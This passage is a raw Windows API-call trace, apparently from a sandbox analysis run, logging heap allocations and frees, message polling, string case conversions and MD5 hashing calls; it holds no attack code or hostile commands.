RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.069] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.069] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.069] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.069] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0257.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.071] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.072] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.072] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.073] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.073] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.073] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.073] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.073] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.074] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.074] CryptHashData (hHash=0xaa5960, pbData=0x24b1698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0257.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0257.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0257.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0257.078] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.079] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.079] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.080] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.080] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.080] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.080] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.080] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: 